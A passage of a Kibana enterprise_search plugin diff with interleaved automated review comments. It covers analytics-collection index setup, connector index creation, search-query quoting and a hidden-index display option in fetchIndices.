'example', + }, + }, + }); + expect(setupAnalyticsCollectionIndex as jest.Mock).toHaveBeenCalledWith( + mockClient.asCurrentUser + ); + }); + + it('should not call setup connectors on other errors', async () => { + mockClient.asCurrentUser.search.mockImplementationOnce(() => + Promise.reject({ + meta: { + body: { + error: { + type: 'other error', + }, + }, + }, + }) + ); + await expect(fetchAnalyticsCollectionByName(mockClient as any, 'example')).resolves.toEqual( + undefined + ); + expect(mockClient.asCurrentUser.search).toHaveBeenCalledWith({ + index: ANALYTICS_COLLECTIONS_INDEX, + query: { + term: { + name: 'example', + }, + }, + }); + expect(setupAnalyticsCollectionIndex as jest.Mock).not.toHaveBeenCalled(); + }); + }); +}); diff --git a/x-pack/plugins/enterprise_search/server/lib/analytics/fetch_analytics_collection.ts b/x-pack/plugins/enterprise_search/server/lib/analytics/fetch_analytics_collection.ts new file mode 100644 index 0000000000000..46f718d23976d --- /dev/null +++ b/x-pack/plugins/enterprise_search/server/lib/analytics/fetch_analytics_collection.ts 
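Review bot: The third test's title 'should not call setup connectors on other errors' is copied from the connectors suite and names the wrong module; `it('should not call setupAnalyticsCollectionIndex on other errors', …)` matches what it asserts. The same test passes `mockClient as any` while the two above use `mockClient as unknown as IScopedClusterClient`, which is the form the other new tests in this change use. This test also pins that any non-index-not-found error from `search` resolves to `undefined`, so if that swallow is tightened in `fetch_analytics_collection.ts` this expectation has to become a rejection.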
@@ -0,0 +1,38 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { IScopedClusterClient } from '@kbn/core-elasticsearch-server'; + +import { ANALYTICS_COLLECTIONS_INDEX } from '../..'; +import { AnalyticsCollection } from '../../../common/types/analytics'; + +import { isIndexNotFoundException } from '../../utils/identify_exceptions'; + +import { setupAnalyticsCollectionIndex } from './setup_indices'; + +export const fetchAnalyticsCollectionByName = async ( + client: IScopedClusterClient, + name: string +): Promise => { + try { + const searchResults = await client.asCurrentUser.search({ + index: ANALYTICS_COLLECTIONS_INDEX, + query: { term: { name } }, + }); + + const result = searchResults.hits.hits[0]?._source + ? { ...searchResults.hits.hits[0]._source, id: searchResults.hits.hits[0]._id } + : undefined; + + return result; + } catch (error) { + if (isIndexNotFoundException(error)) { + await setupAnalyticsCollectionIndex(client.asCurrentUser); + } + return undefined; + } +}; diff --git a/x-pack/plugins/enterprise_search/server/lib/analytics/setup_indices.test.ts b/x-pack/plugins/enterprise_search/server/lib/analytics/setup_indices.test.ts new file mode 100644 index 0000000000000..ec72d7562b44e --- /dev/null +++ b/x-pack/plugins/enterprise_search/server/lib/analytics/setup_indices.test.ts 
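Review bot: The `catch` returns `undefined` for every error, not only `index_not_found_exception`, so a timeout, a 403 or any other failure of `search` is indistinguishable from "no collection with that name"; `createAnalyticsCollection` in this same change treats that `undefined` as a go-ahead and indexes a new document, so a transient search failure produces a duplicate collection. Rethrowing unrelated errors keeps the not-found recovery and lets the caller see the failure: make `if (!isIndexNotFoundException(error)) throw error;` the first line of the catch, followed by the existing `setupAnalyticsCollectionIndex` call and `return undefined;`. The accompanying test 'should not call setup connectors on other errors' currently expects the swallow and would need to expect a rejection instead. `query: { term: { name } }` sets no `size`, so when more than one document matches (nothing enforces uniqueness) `hits[0]` wins silently; a comment noting that, or `size: 1`, would make the behaviour explicit.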
@@ -0,0 +1,77 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { ANALYTICS_VERSION } from '../..'; + +import { setupAnalyticsCollectionIndex } from './setup_indices'; + +describe('setup analytics collection index', () => { + const mockClient = { + asCurrentUser: { + indices: { + create: jest.fn(), + updateAliases: jest.fn(), + }, + }, + asInternalUser: {}, + }; + + beforeEach(() => { + jest.clearAllMocks(); + }); + + it("should create the analytics collection index when it doesn't exist", async () => { + const indexName = '.elastic-analytics-collections'; + const analyticCollectionsMappings = { + _meta: { + version: ANALYTICS_VERSION, + }, + properties: { + event_retention_day_length: { + type: 'long', + }, + name: { + type: 'keyword', + }, + }, + }; + + mockClient.asCurrentUser.indices.create.mockImplementation(() => Promise.resolve()); + mockClient.asCurrentUser.indices.updateAliases.mockImplementation(() => Promise.resolve()); + await expect(setupAnalyticsCollectionIndex(mockClient.asCurrentUser as any)).resolves.toEqual( + undefined + ); + expect(mockClient.asCurrentUser.indices.create).toHaveBeenCalledWith({ + index: `${indexName}-v${1}`, + mappings: analyticCollectionsMappings, + settings: { auto_expand_replicas: '0-3', hidden: true, number_of_replicas: 0 }, + }); + expect(mockClient.asCurrentUser.indices.updateAliases).toHaveBeenCalledWith({ + actions: [ + { + add: { + aliases: [indexName], + index: `${indexName}-v${1}`, + is_hidden: true, + is_write_index: true, + }, + }, + ], + }); + }); + + it('should do nothing if it hits that resource already exists', async () => { + mockClient.asCurrentUser.indices.create.mockImplementation(() => + Promise.reject({ meta: { body: { error: { type: 'resource_already_exists_exception' } } } }) + ); + 
await expect(setupAnalyticsCollectionIndex(mockClient.asCurrentUser as any)).resolves.toEqual( + undefined + ); + expect(mockClient.asCurrentUser.indices.updateAliases).not.toHaveBeenCalled(); + expect(mockClient.asCurrentUser.indices.create).toHaveBeenCalled(); + }); +}); diff --git a/x-pack/plugins/enterprise_search/server/lib/analytics/setup_indices.ts b/x-pack/plugins/enterprise_search/server/lib/analytics/setup_indices.ts new file mode 100644 index 0000000000000..49a8aaca6f50f --- /dev/null +++ b/x-pack/plugins/enterprise_search/server/lib/analytics/setup_indices.ts 
@@ -0,0 +1,79 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +import { + IndicesIndexSettings, + MappingProperty, + MappingTypeMapping, +} from '@elastic/elasticsearch/lib/api/types'; +import { ElasticsearchClient } from '@kbn/core-elasticsearch-server'; + +import { ANALYTICS_COLLECTIONS_INDEX, ANALYTICS_VERSION } from '../..'; +import { isResourceAlreadyExistsException } from '../../utils/identify_exceptions'; + +const analyticsCollectionMappingsProperties: Record = { + event_retention_day_length: { + type: 'long', + }, + name: { + type: 'keyword', + }, +}; + +const defaultSettings: IndicesIndexSettings = { + auto_expand_replicas: '0-3', + hidden: true, + number_of_replicas: 0, +}; + +interface IndexDefinition { + aliases: string[]; + mappings: MappingTypeMapping; + name: string; + settings: IndicesIndexSettings; +} + +export const setupAnalyticsCollectionIndex = async (client: ElasticsearchClient) => { + const indexConfiguration: IndexDefinition = { + aliases: [ANALYTICS_COLLECTIONS_INDEX], + mappings: { + _meta: { + version: ANALYTICS_VERSION, + }, + properties: analyticsCollectionMappingsProperties, + }, + name: `${ANALYTICS_COLLECTIONS_INDEX}-v${ANALYTICS_VERSION}`, + settings: defaultSettings, + }; + + try { + const { mappings, aliases, name: index, settings } = indexConfiguration; + await client.indices.create({ + index, + mappings, + settings, + }); + await client.indices.updateAliases({ + actions: [ + { + add: { + aliases, + index, + is_hidden: true, + is_write_index: true, + }, + }, + ], + }); + } catch (error) { + if (isResourceAlreadyExistsException(error)) { + // index already exists, swallow error + return; + } + return error; + } +}; 
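Review bot: The `catch` ends with `return error;` rather than `throw error;`, so any failure of `indices.create` or `updateAliases` other than resource_already_exists resolves the promise successfully with the error object as its value; `addAnalyticsCollection` and `fetchAnalyticsCollectionByName` in this change `await` the call without inspecting the result and carry on writing to an index that was never created. `throw error;` is the one-line fix, and an explicit `: Promise<void>` return type would document that the function has no meaningful result. Separately, `create` and `updateAliases` are not atomic: if the first succeeds and the second fails, the next attempt gets resource_already_exists from `create`, returns early, and the `ANALYTICS_COLLECTIONS_INDEX` alias is never attached, which is exactly what `indices.exists` in `addAnalyticsCollection` checks for. Still attempting the alias update on the already-exists path, or checking for the alias separately, would close that gap. The `// index already exists, swallow error` comment should then also say that a missing alias is not covered by this branch.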
diff --git a/x-pack/plugins/enterprise_search/server/lib/connectors/add_connector.test.ts b/x-pack/plugins/enterprise_search/server/lib/connectors/add_connector.test.ts index ac20e09284185..adb99b98a4226 100644 --- a/x-pack/plugins/enterprise_search/server/lib/connectors/add_connector.test.ts +++ b/x-pack/plugins/enterprise_search/server/lib/connectors/add_connector.test.ts @@ -40,13 +40,20 @@ describe('addConnector lib function', () => { asInternalUser: {}, }; + const createConnectorsIndexExistsFn = + (connectorsIndexExists: boolean, defaultValue: boolean) => + ({ index }: { index: string }) => + index === CONNECTORS_INDEX ? connectorsIndexExists : defaultValue; + beforeEach(() => { jest.clearAllMocks(); }); it('should add connector', async () => { mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); - mockClient.asCurrentUser.indices.exists.mockImplementation(() => false); + mockClient.asCurrentUser.indices.exists.mockImplementation( + createConnectorsIndexExistsFn(true, false) + ); (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => undefined); (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => undefined); @@ -82,7 +89,9 @@ describe('addConnector lib function', () => { it('should reject if index already exists', async () => { mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); - mockClient.asCurrentUser.indices.exists.mockImplementation(() => true); + mockClient.asCurrentUser.indices.exists.mockImplementation( + createConnectorsIndexExistsFn(true, true) + ); (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => undefined); (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => undefined); 
@@ -97,7 +106,9 @@ describe('addConnector lib function', () => { it('should reject if connector already exists', async () => { mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); - mockClient.asCurrentUser.indices.exists.mockImplementation(() => false); + mockClient.asCurrentUser.indices.exists.mockImplementation( + createConnectorsIndexExistsFn(true, false) + ); (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => true); (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => undefined); @@ -110,9 +121,28 @@ describe('addConnector lib function', () => { expect(mockClient.asCurrentUser.indices.create).not.toHaveBeenCalled(); }); + it('should reject if crawler already exists', async () => { + mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); + mockClient.asCurrentUser.indices.exists.mockImplementation( + createConnectorsIndexExistsFn(true, false) + ); + (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => undefined); + (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => true); + + await expect( + addConnector(mockClient as unknown as IScopedClusterClient, { + index_name: 'index_name', + language: 'en', + }) + ).rejects.toEqual(new Error(ErrorCode.CRAWLER_ALREADY_EXISTS)); + expect(mockClient.asCurrentUser.indices.create).not.toHaveBeenCalled(); + }); + it('should reject with index already exists if connector and index already exist', async () => { mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); - mockClient.asCurrentUser.indices.exists.mockImplementation(() => true); + mockClient.asCurrentUser.indices.exists.mockImplementation( + createConnectorsIndexExistsFn(true, true) + ); (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => true); (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => undefined); 
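Review bot: The new 'should reject if crawler already exists' test asserts only that `indices.create` was not called, whereas the 'should not create index if crawler exists' test removed at the end of this file's diff also asserted `expect(mockClient.asCurrentUser.index).not.toHaveBeenCalled();`; without that line the test still passes if `createConnector` indexes a document before rejecting. Adding the `index` assertion restores the dropped coverage. The removed 'should not create index if status code is not 404' test has no replacement in this file, so propagation of a non-404 error from `index` is no longer exercised for connectors.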
@@ -127,7 +157,9 @@ describe('addConnector lib function', () => { it('should replace connector if deleteExistingConnector flag is true', async () => { mockClient.asCurrentUser.index.mockImplementation(() => ({ _id: 'fakeId' })); - mockClient.asCurrentUser.indices.exists.mockImplementation(() => false); + mockClient.asCurrentUser.indices.exists.mockImplementation( + createConnectorsIndexExistsFn(true, false) + ); (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => ({ id: 'connectorId' })); (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => undefined); @@ -167,13 +199,9 @@ describe('addConnector lib function', () => { }); it('should create index if no connectors index exists', async () => { - mockClient.asCurrentUser.index.mockImplementationOnce(() => { - return Promise.reject({ - meta: { body: { error: { type: 'index_not_found_exception' } } }, - statusCode: 404, - }); - }); - mockClient.asCurrentUser.indices.exists.mockImplementation(() => false); + mockClient.asCurrentUser.indices.exists.mockImplementation( + createConnectorsIndexExistsFn(false, false) + ); (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => false); (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => undefined); await expect( 
@@ -206,36 +234,4 @@ describe('addConnector lib function', () => { settings: textAnalysisSettings('en'), }); }); - it('should not create index if status code is not 404', async () => { - mockClient.asCurrentUser.index.mockImplementationOnce(() => { - return Promise.reject({ statusCode: 500 }); - }); - mockClient.asCurrentUser.indices.exists.mockImplementation(() => false); - (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => false); - (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => undefined); - await expect( - addConnector(mockClient as unknown as IScopedClusterClient, { - index_name: 'index_name', - language: 'en', - }) - ).rejects.toEqual({ statusCode: 500 }); - expect(setupConnectorsIndices).not.toHaveBeenCalled(); - expect(mockClient.asCurrentUser.index).toHaveBeenCalledTimes(1); - }); - it('should not create index if crawler exists', async () => { - mockClient.asCurrentUser.index.mockImplementationOnce(() => { - return 'connector '; - }); - mockClient.asCurrentUser.indices.exists.mockImplementation(() => false); - (fetchConnectorByIndexName as jest.Mock).mockImplementation(() => false); - (fetchCrawlerByIndexName as jest.Mock).mockImplementation(() => 'crawler'); - await expect( - addConnector(mockClient as unknown as IScopedClusterClient, { - index_name: 'index_name', - language: 'en', - }) - ).rejects.toEqual(new Error(ErrorCode.CRAWLER_ALREADY_EXISTS)); - expect(setupConnectorsIndices).not.toHaveBeenCalled(); - expect(mockClient.asCurrentUser.index).not.toHaveBeenCalled(); - }); }); diff --git a/x-pack/plugins/enterprise_search/server/lib/connectors/add_connector.ts b/x-pack/plugins/enterprise_search/server/lib/connectors/add_connector.ts index 8528b28582bf0..39a9d562106d0 100644 --- a/x-pack/plugins/enterprise_search/server/lib/connectors/add_connector.ts +++ b/x-pack/plugins/enterprise_search/server/lib/connectors/add_connector.ts 
@@ -11,7 +11,6 @@ import { CONNECTORS_INDEX } from '../..'; import { ConnectorDocument, ConnectorStatus } from '../../../common/types/connectors'; import { ErrorCode } from '../../../common/types/error_codes'; import { setupConnectorsIndices } from '../../index_management/setup_indices'; -import { isIndexNotFoundException } from '../../utils/identify_exceptions'; import { fetchCrawlerByIndexName } from '../crawler/fetch_crawlers'; import { textAnalysisSettings } from '../indices/text_analysis'; @@ -80,21 +79,11 @@ export const addConnector = async ( status: ConnectorStatus.CREATED, sync_now: false, }; - try { - return await createConnector( - document, - client, - input.language, - !!input.delete_existing_connector - ); - } catch (error) { - if (isIndexNotFoundException(error)) { - // This means .ent-search-connectors index doesn't exist yet - // So we first have to create it, and then try inserting the document again - await setupConnectorsIndices(client.asCurrentUser); - return await createConnector(document, client, input.language, false); - } else { - throw error; - } + const connectorsIndexExists = await client.asCurrentUser.indices.exists({ + index: CONNECTORS_INDEX, + }); + if (!connectorsIndexExists) { + await setupConnectorsIndices(client.asCurrentUser); } + return await createConnector(document, client, input.language, !!input.delete_existing_connector); }; diff --git a/x-pack/plugins/enterprise_search/server/lib/fetch_search_results.test.ts b/x-pack/plugins/enterprise_search/server/lib/fetch_search_results.test.ts index 9c3bb302ca45e..2e3b7a202f153 100644 --- a/x-pack/plugins/enterprise_search/server/lib/fetch_search_results.test.ts +++ b/x-pack/plugins/enterprise_search/server/lib/fetch_search_results.test.ts 
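Review bot: Replacing the index_not_found retry with an upfront `indices.exists` turns creation into check-then-act: two first-time requests can both observe `false` and both call `setupConnectorsIndices`, and the recovery that previously handled an index that disappeared between the check and the write is gone, so that case now surfaces as a raw index_not_found_exception from `createConnector`. This is only safe if `setupConnectorsIndices` tolerates resource_already_exists the way `setupAnalyticsCollectionIndex` in this change does, and throws rather than returns on other failures; neither is visible here, so a comment at the call site such as `// setupConnectorsIndices must be idempotent: concurrent first requests may both reach this branch` would record the assumption. The retry semantics also change: the old fallback retried with `delete_existing_connector` forced to `false`, the new code passes `!!input.delete_existing_connector` unconditionally, which looks intentional but deserves a line in the description. The HEAD request on `CONNECTORS_INDEX` is made as the current user, who presumably now needs metadata-level privilege on that index in addition to the write privilege the old path required — worth confirming against the roles this plugin expects. `addConnector` starts outside the hunk.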
@@ -87,7 +87,7 @@ describe('fetchSearchResults lib function', () => { expect(mockClient.asCurrentUser.search).toHaveBeenCalledWith({ from: DEFAULT_FROM_VALUE, index: indexName, - q: query, + q: JSON.stringify(query), size: ENTERPRISE_SEARCH_DOCUMENTS_DEFAULT_DOC_COUNT, }); }); @@ -120,7 +120,7 @@ describe('fetchSearchResults lib function', () => { expect(mockClient.asCurrentUser.search).toHaveBeenCalledWith({ from: DEFAULT_FROM_VALUE, index: indexName, - q: query, + q: JSON.stringify(query), size: ENTERPRISE_SEARCH_DOCUMENTS_DEFAULT_DOC_COUNT, }); }); diff --git a/x-pack/plugins/enterprise_search/server/lib/fetch_search_results.ts b/x-pack/plugins/enterprise_search/server/lib/fetch_search_results.ts index d44ef938af98d..b7c3bf81e0ca5 100644 --- a/x-pack/plugins/enterprise_search/server/lib/fetch_search_results.ts +++ b/x-pack/plugins/enterprise_search/server/lib/fetch_search_results.ts @@ -21,7 +21,7 @@ export const fetchSearchResults = async ( from, index: indexName, size, - ...(!!query ? { q: query } : {}), + ...(!!query ? { q: JSON.stringify(query) } : {}), }); return results; }; diff --git a/x-pack/plugins/enterprise_search/server/lib/indices/fetch_indices.test.ts b/x-pack/plugins/enterprise_search/server/lib/indices/fetch_indices.test.ts index d7f7b6185eaa6..1fc8f4cc07186 100644 --- a/x-pack/plugins/enterprise_search/server/lib/indices/fetch_indices.test.ts +++ b/x-pack/plugins/enterprise_search/server/lib/indices/fetch_indices.test.ts @@ -5,6 +5,13 @@ * 2.0. */ +import { + getIndexReturnValue, + mockMultiIndexResponse, + mockMultiStatsResponse, + mockPrivilegesResponse, +} from '../../__mocks__/fetch_indices.mock'; + import { ByteSizeValue } from '@kbn/config-schema'; import { IScopedClusterClient } from '@kbn/core/server'; 
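Review bot: The intent of `q: JSON.stringify(query)` is not stated and is easy to misread as a bug: for a string `query` it wraps the text in double quotes and escapes embedded `"` and `\`, which the query_string parser behind `q` presumably reads as a phrase, so user input is no longer interpreted as query syntax (`field:value`, `AND`, wildcards). If that is the goal, say so at the call, e.g. `// quote the user text so query_string treats it as a phrase rather than as operators`. If `query` can be anything other than a string, `JSON.stringify` yields JSON text that would be searched for literally, so the parameter's type should pin it to `string`; the guard `!!query` additionally drops an empty string, which looks intended. `fetchSearchResults` starts outside the hunk.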
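Review bot: The new `__mocks__` import in `fetch_indices.test.ts` is placed above the `@kbn/config-schema` and `@kbn/core/server` imports, while the other new files in this change (`add_analytics_collection.ts`, `fetch_analytics_collection.ts`) put package imports first and relative imports after; moving the mock import below the `@kbn` block keeps the ordering consistent and is what an import-order lint rule would presumably expect. The hunk touches only the import block; the `describe` it feeds is further down the file.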
@@ -13,6 +20,7 @@ import { fetchIndices } from './fetch_indices'; describe('fetchIndices lib function', () => { const mockClient = { asCurrentUser: { + count: jest.fn().mockReturnValue({ count: 100 }), indices: { get: jest.fn(), stats: jest.fn(), @@ -20,7 +28,6 @@ describe('fetchIndices lib function', () => { security: { hasPrivileges: jest.fn(), }, - count: jest.fn().mockReturnValue({ count: 100 }), }, asInternalUser: {}, }; @@ -53,11 +60,11 @@ describe('fetchIndices lib function', () => { mockClient.asCurrentUser.security.hasPrivileges.mockImplementation(() => ({ index: { - 'index-without-prefix': { read: true, manage: true }, - 'search-aliased': { read: true, manage: true }, - 'search-double-aliased': { read: true, manage: true }, - 'search-regular-index': { read: true, manage: true }, - 'second-index': { read: true, manage: true }, + 'index-without-prefix': { manage: true, read: true }, + 'search-aliased': { manage: true, read: true }, + 'search-double-aliased': { manage: true, read: true }, + 'search-regular-index': { manage: true, read: true }, + 'second-index': { manage: true, read: true }, }, })); @@ -76,12 +83,12 @@ describe('fetchIndices lib function', () => { fetchIndices(mockClient as unknown as IScopedClusterClient, 'search-*', false, true) ).resolves.toEqual([ { + alias: false, count: 100, health: 'green', name: 'search-regular-index', + privileges: { manage: true, read: true }, status: 'open', - alias: false, - privileges: { read: true, manage: true }, total: { docs: { count: 100, @@ -125,12 +132,12 @@ describe('fetchIndices lib function', () => { fetchIndices(mockClient as unknown as IScopedClusterClient, 'search-*', true, true) ).resolves.toEqual([ { + alias: false, count: 100, health: 'green', name: 'search-regular-index', + privileges: { manage: true, read: true }, status: 'open', - alias: false, - privileges: { read: true, manage: true }, total: { docs: { count: 100, 
@@ -368,4 +375,113 @@ describe('fetchIndices lib function', () => { ).resolves.toEqual([]); expect(mockClient.asCurrentUser.indices.stats).not.toHaveBeenCalled(); }); + + describe('alwaysShowSearchPattern', () => { + beforeEach(() => { + mockClient.asCurrentUser.indices.get.mockImplementation(() => mockMultiIndexResponse); + mockClient.asCurrentUser.indices.stats.mockImplementation(() => mockMultiStatsResponse); + + mockClient.asCurrentUser.security.hasPrivileges.mockImplementation(() => ({ + index: mockPrivilegesResponse, + })); + }); + + it('overrides hidden indices setting', async () => { + const returnValue = await fetchIndices( + mockClient as unknown as IScopedClusterClient, + '*', + false, + true, + 'search-' + ); + + // This is the list of mock indices and aliases that are: + // - Non-hidden indices and aliases + // - search- prefixed aliases that point to hidden indices + expect(returnValue).toEqual( + [ + 'regular-index', + 'alias-regular-index', + 'search-alias-regular-index', + 'search-prefixed-regular-index', + 'alias-search-prefixed-regular-index', + 'search-alias-search-prefixed-regular-index', + 'search-alias-hidden-index', + 'search-alias-search-prefixed-hidden-index', + ].map(getIndexReturnValue) + ); + + // This is the list of mock indices and aliases that are: + // - Hidden indices + // - aliases to hidden indices that has no prefix + expect(returnValue).toEqual( + expect.not.arrayContaining( + [ + 'hidden-index', + 'search-prefixed-hidden-index', + 'alias-hidden-index', + 'alias-search-prefixed-hidden-index', + ].map(getIndexReturnValue) + ) + ); + + expect(mockClient.asCurrentUser.indices.get).toHaveBeenCalledWith({ + expand_wildcards: ['hidden', 'all'], + features: ['aliases', 'settings'], + filter_path: ['*.aliases', '*.settings.index.hidden'], + index: '*', + }); + + expect(mockClient.asCurrentUser.indices.stats).toHaveBeenCalledWith({ + expand_wildcards: ['hidden', 'all'], + index: '*', + metric: ['docs', 'store'], + }); + + 
expect(mockClient.asCurrentUser.security.hasPrivileges).toHaveBeenCalledWith({ + index: [ + { + names: expect.arrayContaining(Object.keys(mockMultiStatsResponse.indices)), + privileges: ['read', 'manage'], + }, + ], + }); + }); + + it('returns everything if hidden indices set', async () => { + const returnValue = await fetchIndices( + mockClient as unknown as IScopedClusterClient, + '*', + true, + true, + 'search-' + ); + + expect(returnValue).toEqual( + expect.arrayContaining(Object.keys(mockMultiStatsResponse.indices).map(getIndexReturnValue)) + ); + + expect(mockClient.asCurrentUser.indices.get).toHaveBeenCalledWith({ + expand_wildcards: ['hidden', 'all'], + features: ['aliases', 'settings'], + filter_path: ['*.aliases', '*.settings.index.hidden'], + index: '*', + }); + + expect(mockClient.asCurrentUser.indices.stats).toHaveBeenCalledWith({ + expand_wildcards: ['hidden', 'all'], + index: '*', + metric: ['docs', 'store'], + }); + + expect(mockClient.asCurrentUser.security.hasPrivileges).toHaveBeenCalledWith({ + index: [ + { + names: expect.arrayContaining(Object.keys(mockMultiStatsResponse.indices)), + privileges: ['read', 'manage'], + }, + ], + }); + }); + }); }); diff --git a/x-pack/plugins/enterprise_search/server/lib/indices/fetch_indices.ts b/x-pack/plugins/enterprise_search/server/lib/indices/fetch_indices.ts index aa2ac7853dc10..28a5373d50ac5 100644 --- a/x-pack/plugins/enterprise_search/server/lib/indices/fetch_indices.ts +++ b/x-pack/plugins/enterprise_search/server/lib/indices/fetch_indices.ts 
@@ -59,10 +59,13 @@ export const fetchIndices = async ( client: IScopedClusterClient, indexPattern: string, returnHiddenIndices: boolean, - includeAliases: boolean + includeAliases: boolean, + alwaysShowSearchPattern?: 'search-' ): Promise => { // This call retrieves alias and settings information about indices - const expandWildcards: ExpandWildcard[] = returnHiddenIndices ? ['hidden', 'all'] : ['open']; + // If we provide an override pattern with alwaysShowSearchPattern we get everything and filter out hiddens. + const expandWildcards: ExpandWildcard[] = + returnHiddenIndices || alwaysShowSearchPattern ? ['hidden', 'all'] : ['open']; const totalIndices = await client.asCurrentUser.indices.get({ expand_wildcards: expandWildcards, // for better performance only compute aliases and settings of indices but not mappings @@ -73,12 +76,22 @@ export const fetchIndices = async ( index: indexPattern, }); + // Index names that with one of their aliases match with the alwaysShowSearchPattern + const alwaysShowPatternMatches = new Set(); + const indexAndAliasNames = Object.keys(totalIndices).reduce((accum, indexName) => { accum.push(indexName); if (includeAliases) { const aliases = Object.keys(totalIndices[indexName].aliases!); - aliases.forEach((alias) => accum.push(alias)); + aliases.forEach((alias) => { + accum.push(alias); + + // Add indexName to the set if an alias matches the pattern + if (alwaysShowSearchPattern && alias.startsWith(alwaysShowSearchPattern)) { + alwaysShowPatternMatches.add(indexName); + } + }); } return accum; }, [] as string[]); 
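Review bot: The new comment `// Index names that with one of their aliases match with the alwaysShowSearchPattern` is garbled; `// Names of indices that have at least one alias starting with alwaysShowSearchPattern` says what the Set holds. Typing the new parameter as the literal `'search-'` rather than `string` pins the prefix at the signature while the name suggests a general pattern; either widen it to `string` or document why only that prefix is allowed. Once the parameter is set, `expand_wildcards` becomes `['hidden', 'all']` even when `returnHiddenIndices` is false, so `indices.get` and the `indices.stats`/`hasPrivileges` calls that follow (outside this hunk) now cover every hidden index matched by `indexPattern` just to retain the `search-` aliases, which deserves a cost comment given that the route in indices.ts passes `'*'`. fetchIndices continues outside the hunk.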
@@ -110,7 +123,36 @@ export const fetchIndices = async ( const indexCounts = await fetchIndexCounts(client, indexAndAliasNames); - return indicesNames + // Index data to show even if they are hidden, set by alwaysShowSearchPattern + const alwaysShowIndices = alwaysShowSearchPattern + ? Array.from(alwaysShowPatternMatches) + .map((indexName: string) => { + const indexData = totalIndices[indexName]; + const indexStats = indicesStats[indexName]; + return mapIndexStats(indexData, indexStats, indexName); + }) + .flatMap(({ name, aliases, ...indexData }) => { + const indicesAndAliases = [] as ElasticsearchIndexWithPrivileges[]; + + if (includeAliases) { + aliases.forEach((alias) => { + if (alias.startsWith(alwaysShowSearchPattern)) { + indicesAndAliases.push({ + alias: true, + count: indexCounts[alias] ?? 0, + name: alias, + privileges: { manage: false, read: false, ...indexPrivileges[name] }, + ...indexData, + }); + } + }); + } + + return indicesAndAliases; + }) + : []; + + const regularIndexData = indicesNames .map((indexName: string) => { const indexData = totalIndices[indexName]; const indexStats = indicesStats[indexName]; 
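Review bot: The alias object built inside the new `flatMap` callback (`alias: true, count: indexCounts[alias] ?? 0, name: alias, privileges: { manage: false, read: false, ...indexPrivileges[name] }, ...indexData`) duplicates, field for field, the one the regular path constructs in the next hunk; a helper such as `const toAliasEntry = (alias: string, indexName: string, indexData) => ({ alias: true, count: indexCounts[alias] ?? 0, name: alias, privileges: { manage: false, read: false, ...indexPrivileges[indexName] }, ...indexData })` would keep both in step when a field is added. Within the callback, `forEach` plus `push` reads more naturally as `aliases.filter((alias) => alias.startsWith(alwaysShowSearchPattern)).map(toAliasEntry...)`, with the `includeAliases` guard returning `[]` directly. The privileges attached to a `search-` alias are those of the underlying hidden index, which is the right source but deserves a one-line comment since `name` here is the index name destructured from `mapIndexStats`'s result, not the alias. fetchIndices continues outside the hunk.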
@@ -120,30 +162,42 @@ export const fetchIndices = async ( // expand aliases and add to results const indicesAndAliases = [] as ElasticsearchIndexWithPrivileges[]; indicesAndAliases.push({ - name, - count: indexCounts[name] ?? 0, alias: false, - privileges: { read: false, manage: false, ...indexPrivileges[name] }, + count: indexCounts[name] ?? 0, + name, + privileges: { manage: false, read: false, ...indexPrivileges[name] }, ...indexData, }); if (includeAliases) { aliases.forEach((alias) => { indicesAndAliases.push({ - name: alias, - count: indexCounts[alias] ?? 0, alias: true, - privileges: { read: false, manage: false, ...indexPrivileges[name] }, + count: indexCounts[alias] ?? 0, + name: alias, + privileges: { manage: false, read: false, ...indexPrivileges[name] }, ...indexData, }); }); } return indicesAndAliases; - }) - .filter( - ({ name }, index, array) => - // make list of aliases unique since we add an alias per index above - // and aliases can point to multiple indices - array.findIndex((engineData) => engineData.name === name) === index - ); + }); + + const indexNamesAlreadyIncluded = regularIndexData.map(({ name }) => name); + const indexNamesToInclude = alwaysShowIndices + .map(({ name }) => name) + .filter((name) => !indexNamesAlreadyIncluded.includes(name)); + + const itemsToInclude = alwaysShowIndices.filter(({ name }) => indexNamesToInclude.includes(name)); + + const indicesData = alwaysShowSearchPattern + ? ([...regularIndexData, ...itemsToInclude] as ElasticsearchIndexWithPrivileges[]) + : regularIndexData; + + return indicesData.filter( + ({ name }, index, array) => + // make list of aliases unique since we add an alias per index above + // and aliases can point to multiple indices + array.findIndex((engineData) => engineData.name === name) === index + ); }; diff --git a/x-pack/plugins/enterprise_search/server/plugin.ts b/x-pack/plugins/enterprise_search/server/plugin.ts index cfc3d8d196fd9..f9d23af141119 100644 
